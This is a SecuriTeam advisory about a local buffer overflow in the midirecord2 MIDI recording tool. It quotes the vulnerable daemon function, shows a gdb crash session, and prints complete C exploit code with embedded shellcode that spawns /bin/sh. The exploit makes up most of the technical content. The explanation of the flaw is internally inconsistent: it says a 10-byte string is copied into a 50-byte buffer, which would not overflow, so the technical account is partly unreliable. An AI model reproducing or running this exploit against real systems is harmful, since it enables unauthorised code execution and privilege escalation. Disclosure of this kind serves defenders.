[UNIX] Midirecord2 Local Buffer Overflow (filename)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Midirecord2 Local Buffer Overflow (filename)
------------------------------------------------------------------------


SUMMARY

<http://tuma.stc.cx/progs.php> Midirecord is "a simple command-line
application to record a MIDI file with your MIDI keyboard. It also
features automatic recording to a MIDI file when you play electric piano,
and thus it may be used as a recording daemon". A buffer overflow in
midirecord allows attackers to cause the product to overflow an internal
buffer causing it to execute arbitrary code.

DETAILS

The function daemon in affected by a buffer overflow which could allow an
attacker to execute malicious code from local. The problem is caused by
the copying of a string of max 10 bytes in the filename buffer of only 50
bytes.

Vulnerable code in midirecord.cc:
void daemon(FILE* fin)
{
char filename[50];
printf("Waiting for note-on event.\n");
while(cont)
{
unsigned char status;
fread(&status, 1, 1, fin); // read status
if(status>>4 == 0x9)
{
get_datestr(filename);
printf("Starting to record to %s.\n",filename);
recordmidi(fin, filename);
if(cont)
printf("Finished. Starting to wait for note-on event.\n");
}
}

}

Proof of Concept:
$gdb midirecord
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i486-linux-gnu"...Using host libthread_db
library "/lib/tls/i686/cmov/libthread_db.so.1".

(gdb) r `perl -e 'print "A" x 10000'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /tmp/midirecord2c/midirecord `perl -e 'print "A" x
10000'`
Waiting for note-on event.

Program received signal SIGSEGV, Segmentation fault.
0xb7dcb4b0 in fread () from /lib/tls/i686/cmov/libc.so.6
(gdb)

Exploit code:
/* Successful Exploit in Ubuntu Breezey */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUFSIZE 225
#define ALIGNMENT 1
int main(int argc, char **argv )
{
char shellcode[]=
"\x6a\x17\x58\x31\xdb\xcd\x80"

"\x6a\x0b\x58\x99\x52\x68//sh\x68/bin\x89\xe3\x52\x53\x89\xe1\xcd\x80";

if(argc < 2)
{
fprintf(stderr, "Use : %s <path_to_vuln>\n", argv[0]);
return 0;
}
char *env[] = {shellcode, NULL};
char buf[BUFSIZE];
int i;
int *ap = (int *)(buf + ALIGNMENT);
int ret = 0xbffffffa - strlen(shellcode) -
strlen(argv[1]);

for (i = 0; i < BUFSIZE - 4; i += 4)
*ap++ = ret;
execle(argv[1], "/dev/midi1", buf, NULL, env);

}


ADDITIONAL INFORMATION

The information has been provided by <mailto:the_day@xxxxxxxxxx> Dedi
Dwianto.
The original article can be found at:
<http://advisories.echo.or.id/adv/adv41-theday-2006.txt>
http://advisories.echo.or.id/adv/adv41-theday-2006.txt



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages

  • [NEWS] 0verkill Buffer Overflow Vulnerabilities
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... $HOME environment variable demonstrates the buffer overflow, ... GNU gdb 5.0 ... vulnerability or to otherwise crash the program. ...
    (Securiteam)
  • [EXPL] Windows Lsasrv.dll RPC Buffer Overflow (MS04-011)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Security Authority Service Remote Buffer Overflow, ... char sendbuf; ...
    (Securiteam)
  • [EXPL] Veritas NetBackup Module Stack Overflow (vmd, Exploit)
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Veritas NetBackup Module Stack Overflow ... A buffer overflow vulnerability within Veritas's Volume Manager allows ... char szShellcode[] = ...
    (Securiteam)
  • [NEWS] Ventrilo Denial of Service
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Lack of proper packet handling within Ventrilo allow attackers to crash ... void ventrilo_udp_head_dec(unsigned char *data) ... void ventrilo_udp_data_dec(unsigned char *data, int len, unsigned short ...
    (Securiteam)
  • [EXPL] Citadel/UX Remote Buffer Overflow Exploit
    ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Citadel/UX Remote ... Listed below is a remote ... GNU gdb Red Hat Linux ...
    (Securiteam)